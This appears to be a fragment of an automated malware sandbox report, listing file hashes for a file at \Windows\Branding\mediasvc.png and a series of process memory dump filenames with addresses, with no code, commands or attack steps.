SHA512 80eb80651141c2e00165f089700cc15eb3c5e5eee4ce4e91759e63f5230db8445bc3793c0f5fd259f98ce2939f19633fe7225db990e6574fd739f1d29cf7f223

\Windows\Branding\mediasvc.png

MD5 5768a809b9fcbff117dffa8cbf2e8852
SHA1 a056e76d15bc7509d0361175b2ae4ba348460cd6
SHA256 8ab19cdbe2b963c8bcf8cac6a11e003423ec91ffad88d885d550beb835e46094
SHA512 99d14d6b3c6cf2e872def0b5dd76ffd81d4c71b577bf5fa4700dbb524d5d26bf09d4ffab2dfc6d493303711b635669f35e7cfc90578e6cc2e2f251f422818b8b

memory/1188-354-0x0000000000000000-mapping.dmp

memory/2260-355-0x0000000000000000-mapping.dmp

memory/2516-356-0x0000000000000000-mapping.dmp

memory/1300-357-0x0000000000000000-mapping.dmp

memory/2264-358-0x0000000000000000-mapping.dmp

memory/4076-359-0x0000000000000000-mapping.dmp

memory/1420-360-0x0000000000000000-mapping.dmp

memory/3292-361-0x0000000000000000-mapping.dmp

memory/1520-362-0x0000000000000000-mapping.dmp

memory/2172-363-0x0000000000000000-mapping.dmp

memory/1300-364-0x0000000000000000-mapping.dmp

memory/196-365-0x0000000000000000-mapping.dmp

memory/3968-366-0x0000000000000000-mapping.dmp

memory/1300-367-0x0000000000000000-mapping.dmp

memory/192-368-0x0000000000000000-mapping.dmp

memory/4076-369-0x0000000000000000-mapping.dmp

memory/4076-383-0x0000025276E03000-0x0000025276E05000-memory.dmp

memory/4076-382-0x0000025276E00000-0x0000025276E02000-memory.dmp

memory/4076-384-0x0000025276E06000-0x0000025276E08000-memory.dmp

memory/4076-435-0x0000025276E08000-0x0000025276E09000-memory.dmp

memory/2972-448-0x0000000000000000-mapping.dmp

memory/2264-449-0x0000000000000000-mapping.dmp

memory/2172-492-0x0000000000000000-mapping.dmp

memory/2848-493-0x0000000000000000-mapping.dmp

memory/3472-494-0x0000000000000000-mapping.dmp

memory/188-495-0x0000000000000000-mapping.dmp